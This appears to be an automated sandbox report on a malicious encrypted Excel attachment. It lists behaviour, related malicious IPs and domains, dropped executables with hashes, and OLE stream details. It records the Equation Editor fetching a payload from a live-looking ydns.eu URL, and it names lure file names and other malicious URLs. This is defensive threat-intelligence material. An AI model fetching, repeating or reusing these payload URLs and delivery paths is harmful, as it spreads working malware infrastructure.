                                                                                                                                      Behavior and APIs

                                                                                                                                      TimeTypeDescription
                                                                                                                                      09:00:17API Interceptor77x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                      09:00:23API Interceptor33x Sleep call for process: vbc.exe modified
                                                                                                                                      09:00:41API Interceptor227x Sleep call for process: wscript.exe modified
                                                                                                                                      09:01:19API Interceptor1x Sleep call for process: explorer.exe modified

                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                      IPs

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                      160.153.138.53ExQKDWm3fW.exeGet hashmaliciousBrowse
                                                                                                                                      • www.paletciniz.com/ogg/?sPXp3N=eztizZ807jSs9+CT08HhjptTcxlOOjaZfVWObE9GHZ2oMY4MD52nfpfmGtATm24/doK6&Mvdl=5j2D
                                                                                                                                      Ord-51810.xlsGet hashmaliciousBrowse
                                                                                                                                      • 9dani.com/wp-keys.php
                                                                                                                                      Ord-51810.xlsGet hashmaliciousBrowse
                                                                                                                                      • 9dani.com/wp-keys.php
                                                                                                                                      ref_4264.xlsGet hashmaliciousBrowse
                                                                                                                                      • 9dani.com/wp-keys.php
                                                                                                                                      ref_4264.xlsGet hashmaliciousBrowse
                                                                                                                                      • 9dani.com/wp-keys.php
                                                                                                                                      order_45781.xlsGet hashmaliciousBrowse
                                                                                                                                      • 9dani.com/wp-keys.php
                                                                                                                                      order_45781.xlsGet hashmaliciousBrowse
                                                                                                                                      • 9dani.com/wp-keys.php
                                                                                                                                      Statement-56279.xlsGet hashmaliciousBrowse
                                                                                                                                      • 9dani.com/wp-keys.php
                                                                                                                                      record}.41585.xlsGet hashmaliciousBrowse
                                                                                                                                      • 9dani.com/wp-keys.php
                                                                                                                                      Statement-56279.xlsGet hashmaliciousBrowse
                                                                                                                                      • 9dani.com/wp-keys.php
                                                                                                                                      orderord}39476.xlsGet hashmaliciousBrowse
                                                                                                                                      • 9dani.com/wp-keys.php
                                                                                                                                      record}.41585.xlsGet hashmaliciousBrowse
                                                                                                                                      • 9dani.com/wp-keys.php
                                                                                                                                      orderord}39476.xlsGet hashmaliciousBrowse
                                                                                                                                      • 9dani.com/wp-keys.php
                                                                                                                                      Invoiceord}-55338.xlsGet hashmaliciousBrowse
                                                                                                                                      • 9dani.com/wp-keys.php
                                                                                                                                      Invoiceord}-55338.xlsGet hashmaliciousBrowse
                                                                                                                                      • 9dani.com/wp-keys.php
                                                                                                                                      Docord}_69254.xlsGet hashmaliciousBrowse
                                                                                                                                      • 9dani.com/wp-keys.php
                                                                                                                                      order_26493.xlsGet hashmaliciousBrowse
                                                                                                                                      • 9dani.com/wp-keys.php
                                                                                                                                      Docord}_69254.xlsGet hashmaliciousBrowse
                                                                                                                                      • 9dani.com/wp-keys.php
                                                                                                                                      order_26493.xlsGet hashmaliciousBrowse
                                                                                                                                      • 9dani.com/wp-keys.php
                                                                                                                                      Det_80851.xlsGet hashmaliciousBrowse
                                                                                                                                      • 9dani.com/wp-keys.php
                                                                                                                                      104.164.99.2422020112395387_pdf.exeGet hashmaliciousBrowse
                                                                                                                                      • www.annaothomas.com/ogg/?JfE=L5tkrd37tHlR4/7ukC1rTm4lbmURrJu8I1/xY0HLrBdUzMMJDCBw7KJxyCSyOXKc+tPne00Ejg==&ojq0dR=SzuliJ

                                                                                                                                      Domains

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                      www.annaothomas.com2020112395387_pdf.exeGet hashmaliciousBrowse
                                                                                                                                      • 104.164.99.242

                                                                                                                                      ASN

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                      GODADDY-AMSDEShipment Document BLINV And Packing List Attached.exeGet hashmaliciousBrowse
                                                                                                                                      • 160.153.137.14
                                                                                                                                      ExQKDWm3fW.exeGet hashmaliciousBrowse
                                                                                                                                      • 160.153.138.53
                                                                                                                                      new quotation order.exeGet hashmaliciousBrowse
                                                                                                                                      • 160.153.136.3
                                                                                                                                      Order Catalogue Specifications.xlsxGet hashmaliciousBrowse
                                                                                                                                      • 160.153.137.163
                                                                                                                                      Purchase Order 40,7045.exeGet hashmaliciousBrowse
                                                                                                                                      • 160.153.136.3
                                                                                                                                      Purchase Order 40,7045$.exeGet hashmaliciousBrowse
                                                                                                                                      • 160.153.136.3
                                                                                                                                      ORDER INQUIRY.exeGet hashmaliciousBrowse
                                                                                                                                      • 160.153.136.3
                                                                                                                                      DEBIT NOTE DB-1130.exeGet hashmaliciousBrowse
                                                                                                                                      • 160.153.128.7
                                                                                                                                      esm-Fichero-ES.msiGet hashmaliciousBrowse
                                                                                                                                      • 160.153.143.165
                                                                                                                                      eLaaw7SqMi.exeGet hashmaliciousBrowse
                                                                                                                                      • 160.153.136.3
                                                                                                                                      9Ul8m9FQ47.exeGet hashmaliciousBrowse
                                                                                                                                      • 160.153.136.3
                                                                                                                                      dB7XQuemMc.exeGet hashmaliciousBrowse
                                                                                                                                      • 160.153.128.3
                                                                                                                                      feJbFA6woA.exeGet hashmaliciousBrowse
                                                                                                                                      • 160.153.136.3
                                                                                                                                      PPO040963RG02.exeGet hashmaliciousBrowse
                                                                                                                                      • 160.153.18.187
                                                                                                                                      COMMERCIAL INVOICE BILL OF LADING DOC.exeGet hashmaliciousBrowse
                                                                                                                                      • 160.153.136.3
                                                                                                                                      w4fNtjZBEH.exeGet hashmaliciousBrowse
                                                                                                                                      • 160.153.129.28
                                                                                                                                      ORDER LIST.exeGet hashmaliciousBrowse
                                                                                                                                      • 160.153.128.7
                                                                                                                                      #U306b#U4fee 2020-09-19.docGet hashmaliciousBrowse
                                                                                                                                      • 160.153.252.3
                                                                                                                                      2GYiwgv3lC.exeGet hashmaliciousBrowse
                                                                                                                                      • 160.153.136.3
                                                                                                                                      H4A2-423-EM154-302.exeGet hashmaliciousBrowse
                                                                                                                                      • 160.153.138.219
                                                                                                                                      EGIHOSTINGUSVOMAXTRADING.docGet hashmaliciousBrowse
                                                                                                                                      • 50.117.11.156
                                                                                                                                      inv.exeGet hashmaliciousBrowse
                                                                                                                                      • 104.164.35.80
                                                                                                                                      2020112395387_pdf.exeGet hashmaliciousBrowse
                                                                                                                                      • 104.164.99.242
                                                                                                                                      EME_PO.39134.xlsxGet hashmaliciousBrowse
                                                                                                                                      • 104.164.26.233
                                                                                                                                      new quotation order.exeGet hashmaliciousBrowse
                                                                                                                                      • 104.252.31.62
                                                                                                                                      POGWEAP.xlsxGet hashmaliciousBrowse
                                                                                                                                      • 172.120.44.167
                                                                                                                                      oqTdpbN5rF.exeGet hashmaliciousBrowse
                                                                                                                                      • 104.252.192.7
                                                                                                                                      Purchase Order 40,7045$.exeGet hashmaliciousBrowse
                                                                                                                                      • 104.253.79.71
                                                                                                                                      Payment Advice - Advice Ref GLV823990339.exeGet hashmaliciousBrowse
                                                                                                                                      • 104.164.52.200
                                                                                                                                      INQUIRY.exeGet hashmaliciousBrowse
                                                                                                                                      • 45.39.88.85
                                                                                                                                      Invoice.exeGet hashmaliciousBrowse
                                                                                                                                      • 45.39.153.189
                                                                                                                                      new file.exe.exeGet hashmaliciousBrowse
                                                                                                                                      • 136.0.180.203
                                                                                                                                      hjKM0s7CWW.exeGet hashmaliciousBrowse
                                                                                                                                      • 172.121.57.222
                                                                                                                                      9Ul8m9FQ47.exeGet hashmaliciousBrowse
                                                                                                                                      • 107.164.194.74
                                                                                                                                      n4uladudJS.exeGet hashmaliciousBrowse
                                                                                                                                      • 107.164.194.74
                                                                                                                                      qkN4OZWFG6.exeGet hashmaliciousBrowse
                                                                                                                                      • 50.117.84.157
                                                                                                                                      kvdYhqN3Nh.exeGet hashmaliciousBrowse
                                                                                                                                      • 50.117.84.157
                                                                                                                                      NzI1oP5E74.exeGet hashmaliciousBrowse
                                                                                                                                      • 172.121.57.222
                                                                                                                                      jtFF5EQoEE.exeGet hashmaliciousBrowse
                                                                                                                                      • 142.252.135.158
                                                                                                                                      JwekqCZAwt.exeGet hashmaliciousBrowse
                                                                                                                                      • 172.252.49.106
                                                                                                                                      VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNIN 20201125 PLIN.xlsxGet hashmaliciousBrowse
                                                                                                                                      • 103.125.191.229
                                                                                                                                      ARRIVAL NOTICE.xlsxGet hashmaliciousBrowse
                                                                                                                                      • 103.141.138.87
                                                                                                                                      Confectionary and choco.xlsxGet hashmaliciousBrowse
                                                                                                                                      • 103.125.191.5
                                                                                                                                      Purchase Order PRI19-338.xlsxGet hashmaliciousBrowse
                                                                                                                                      • 103.125.191.187
                                                                                                                                      Copy of Dwg for order DLH200909ShzuSh.xlsxGet hashmaliciousBrowse
                                                                                                                                      • 103.141.138.130
                                                                                                                                      STATEMENT NOV20.xlsxGet hashmaliciousBrowse
                                                                                                                                      • 103.141.138.87
                                                                                                                                      IN 20201125 PLIN.xlsxGet hashmaliciousBrowse
                                                                                                                                      • 103.125.191.229
                                                                                                                                      SCAN_ARRIVAL_DOCUMENTS.xlsxGet hashmaliciousBrowse
                                                                                                                                      • 103.141.138.120
                                                                                                                                      PO23419852020.xlsxGet hashmaliciousBrowse
                                                                                                                                      • 103.141.138.124
                                                                                                                                      New Order .xlsxGet hashmaliciousBrowse
                                                                                                                                      • 103.125.191.5
                                                                                                                                      Request for quotation.xlsxGet hashmaliciousBrowse
                                                                                                                                      • 103.141.138.87
                                                                                                                                      Tyre Pricelist.xlsxGet hashmaliciousBrowse
                                                                                                                                      • 103.125.191.5
                                                                                                                                      2eD17GZuWs.exeGet hashmaliciousBrowse
                                                                                                                                      • 103.125.191.5
                                                                                                                                      Unique food order.xlsxGet hashmaliciousBrowse
                                                                                                                                      • 103.125.191.5
                                                                                                                                      tt payment proof.xlsxGet hashmaliciousBrowse
                                                                                                                                      • 103.125.191.187
                                                                                                                                      TIE-3735-2020.xlsxGet hashmaliciousBrowse
                                                                                                                                      • 103.125.191.229
                                                                                                                                      payslip.s.xlsxGet hashmaliciousBrowse
                                                                                                                                      • 103.125.191.187
                                                                                                                                      Telex-relase.xlsxGet hashmaliciousBrowse
                                                                                                                                      • 103.141.138.120
                                                                                                                                      Y0L60XAhvo.rtfGet hashmaliciousBrowse
                                                                                                                                      • 103.141.138.122
                                                                                                                                      d6pj421rXA.exeGet hashmaliciousBrowse
                                                                                                                                      • 103.139.45.59

                                                                                                                                      JA3 Fingerprints

                                                                                                                                      No context

                                                                                                                                      Dropped Files

                                                                                                                                      No context

                                                                                                                                      Created / dropped Files

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe
                                                                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):399360
                                                                                                                                      Entropy (8bit):7.118443825865952
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:KTitbK35IMjVfUHgRGmqX16+aMWH06dUpfCnm4995z:KT8bA5IdH4GRs+aM6cpCnm
                                                                                                                                      MD5:E54D832CB872B7DC086AB7A7878D38FB
                                                                                                                                      SHA1:DD865DEAFFA4558EEBEBCB83B5335DE2B0B26327
                                                                                                                                      SHA-256:06A0E3845D7B4C5593A9143EB1AE73223760D68F2ACF0E5BE631B9EEAB3675F3
                                                                                                                                      SHA-512:04A78936551DF1BF62D4B256C2A5888AF840D9F1FB1735810B1C5145AF0795C6C84E03B66754137242691AA0FFA26CEB7295D3CDC59323B939DAA8D7CB24BAC0
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 31%
                                                                                                                                      IE Cache URL:http://wsdyneverwalkachinese2loneinlifekwsfnv.ydns.eu/chnsfrnd2/winlog.exe
                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................(...9............./....8...=...Rich...........................PE..L....._.................*...........5.......@....@..........................P............@..................................a...............................0......................................X\..@............@...............................text....).......*.................. ..`.rdata...+...@...,..................@..@.data...`(...p.......Z..............@....rsrc................x..............@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\420BD973.emf
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1099960
                                                                                                                                      Entropy (8bit):2.0152883385143165
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:UXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cy:SahIFdyiaT2qtXw
                                                                                                                                      MD5:FE7496393B4417F687E141BAE9211775
                                                                                                                                      SHA1:507284C9227C103959A885A2F1B354E8F15FD65B
                                                                                                                                      SHA-256:EEDC1AC79E6622FC37D37A9A77C05BB93615B04A1E0A340DD6819CB3BE3183E4
                                                                                                                                      SHA-512:35954EB49D67207FF452C833FB4AB34BDDD8A8F98711F6DDA006E09846EF9AF740FB1E615FEC60A13631B455274005FBAAD08D3EA521DF7AC034739B48387A71
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: ....l...........S................@...%.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I.......%...........%...................................R...p................................@."C.a.l.i.b.r.i.......................................................$................N.U................l....N.U........ ....y.Q........ ............z.Q............................................X...%...7...................{ .@................C.a.l.i.b.r.................X............2.Q.................{.Q............dv......%...........%...........%...........!.......................I......."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I.......P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4F78DCD8.jpeg
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):48770
                                                                                                                                      Entropy (8bit):7.801842363879827
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                      MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                      SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                      SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                      SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C23946F9.jpeg
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):48770
                                                                                                                                      Entropy (8bit):7.801842363879827
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                      MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                      SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                      SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                      SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                      C:\Users\user\Desktop\~$PI202009255687.xlsx
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):330
                                                                                                                                      Entropy (8bit):1.4377382811115937
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                      MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                      SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                      SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                      SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                      Malicious:true
                                                                                                                                      Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                      C:\Users\Public\vbc.exe
                                                                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):399360
                                                                                                                                      Entropy (8bit):7.118443825865952
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:KTitbK35IMjVfUHgRGmqX16+aMWH06dUpfCnm4995z:KT8bA5IdH4GRs+aM6cpCnm
                                                                                                                                      MD5:E54D832CB872B7DC086AB7A7878D38FB
                                                                                                                                      SHA1:DD865DEAFFA4558EEBEBCB83B5335DE2B0B26327
                                                                                                                                      SHA-256:06A0E3845D7B4C5593A9143EB1AE73223760D68F2ACF0E5BE631B9EEAB3675F3
                                                                                                                                      SHA-512:04A78936551DF1BF62D4B256C2A5888AF840D9F1FB1735810B1C5145AF0795C6C84E03B66754137242691AA0FFA26CEB7295D3CDC59323B939DAA8D7CB24BAC0
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 31%
                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................(...9............./....8...=...Rich...........................PE..L....._.................*...........5.......@....@..........................P............@..................................a...............................0......................................X\..@............@...............................text....).......*.................. ..`.rdata...+...@...,..................@..@.data...`(...p.......Z..............@....rsrc................x..............@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      Static File Info

                                                                                                                                      General

                                                                                                                                      File type:CDFV2 Encrypted
                                                                                                                                      Entropy (8bit):7.996820946995735
                                                                                                                                      TrID:
                                                                                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                      File name:PI202009255687.xlsx
                                                                                                                                      File size:2625536
                                                                                                                                      MD5:d7c0c12c1cdf36e9f97f96cb3fe16ae0
                                                                                                                                      SHA1:e73e8bd48f5ef68747de444e44d59745cb75b08a
                                                                                                                                      SHA256:76b2d9b4655b8a349e1b5c7bf05ac5bb22bea988bc818e46756b17d7e22a37d1
                                                                                                                                      SHA512:1032c3abfa95c26c00c42b5bba0ef6bfd565b9391a255f7eb36f5edee271a46fac0e1a707c23a5820a307a76c4773a8b74f0f15efa2c594d6d79e953c52d5a7b
                                                                                                                                      SSDEEP:49152:AP4hSHH7IZl2QU0sAYEr36zvNe3j4qJ8rymPgojJYm493N9STtxX2LoQlByCQ:e4hoIb2Q3vugj4qCrym9tc1ufiO
                                                                                                                                      File Content Preview:........................>...................)...........................................................................................~...............z.......|.......~...............z.......|.......~...............z.......|.......~......................

                                                                                                                                      File Icon

                                                                                                                                      Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                      Static OLE Info

                                                                                                                                      General

                                                                                                                                      Document Type:OLE
                                                                                                                                      Number of OLE Files:1

                                                                                                                                      OLE File "PI202009255687.xlsx"

                                                                                                                                      Indicators

                                                                                                                                      Has Summary Info:False
                                                                                                                                      Application Name:unknown
                                                                                                                                      Encrypted Document:True
                                                                                                                                      Contains Word Document Stream:False
                                                                                                                                      Contains Workbook/Book Stream:False
                                                                                                                                      Contains PowerPoint Document Stream:False
                                                                                                                                      Contains Visio Document Stream:False
                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                      Flash Objects Count:
                                                                                                                                      Contains VBA Macros:False

                                                                                                                                      Streams

                                                                                                                                      Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                      General
                                                                                                                                      Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:64
                                                                                                                                      Entropy:2.73637206947
                                                                                                                                      Base64 Encoded:False
                                                                                                                                      Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                      Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                      Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                      General
                                                                                                                                      Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:112
                                                                                                                                      Entropy:2.7597816111
                                                                                                                                      Base64 Encoded:False
                                                                                                                                      Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                      Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                      Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                      General
                                                                                                                                      Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:200
                                                                                                                                      Entropy:3.13335930328
                                                                                                                                      Base64 Encoded:False
                                                                                                                                      Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                      Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                      Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                      General
                                                                                                                                      Stream Path:\x6DataSpaces/Version
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:76
                                                                                                                                      Entropy:2.79079600998
                                                                                                                                      Base64 Encoded:False
                                                                                                                                      Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                      Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                      Stream Path: EncryptedPackage, File Type: COM executable for DOS, Stream Size: 2600648
                                                                                                                                      General
                                                                                                                                      Stream Path:EncryptedPackage
                                                                                                                                      File Type:COM executable for DOS
                                                                                                                                      Stream Size:2600648
                                                                                                                                      Entropy:7.99992874048
                                                                                                                                      Base64 Encoded:True
                                                                                                                                      Data ASCII:. . ' . . . . . . . ; . . . . [ + . . . . . . . j . % H . s . . . . . k . . S . - . . q . c x r . . ) . . Q . . . \\ S j . . . g @ . . . f . . ? c < 2 . . . . . o 9 B . . 1 . . c < 2 . . . . . o 9 B . . 1 . . c < 2 . . . . . o 9 B . . 1 . . c < 2 . . . . . o 9 B . . 1 . . c < 2 . . . . . o 9 B . . 1 . . c < 2 . . . . . o 9 B . . 1 . . c < 2 . . . . . o 9 B . . 1 . . c < 2 . . . . . o 9 B . . 1 . . c < 2 . . . . . o 9 B . . 1 . . c < 2 . . . . . o 9 B . . 1 . . c < 2 . . . . . o 9 B . . 1 . . c < 2 . . . . .
                                                                                                                                      Data Raw:b8 ae 27 00 00 00 00 00 06 85 3b c0 af 0d 83 5b 2b bc 06 da c3 a0 1e f9 6a c0 25 48 0f 73 dc cc dc f2 95 6b fb fb 53 c6 2d 87 eb 71 95 63 78 72 fb 0e 29 e4 15 51 a0 86 08 5c 53 6a 9f 90 fc 67 40 0c b9 8f 66 f1 94 3f 63 3c 32 d7 d3 8e 97 99 6f 39 42 f7 a3 31 c7 92 63 3c 32 d7 d3 8e 97 99 6f 39 42 f7 a3 31 c7 92 63 3c 32 d7 d3 8e 97 99 6f 39 42 f7 a3 31 c7 92 63 3c 32 d7 d3 8e 97 99
                                                                                                                                      Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                      General
                                                                                                                                      Stream Path:EncryptionInfo
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:224
                                                                                                                                      Entropy:4.51425494201
                                                                                                                                      Base64 Encoded:False
                                                                                                                                      Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . . . M . o . $ . ' . & . . . A g . . . . . / . u . . . . 2 . . . . . . $ p . t k . . . . . ( . . P . . . . . . . u . T . + F . . .
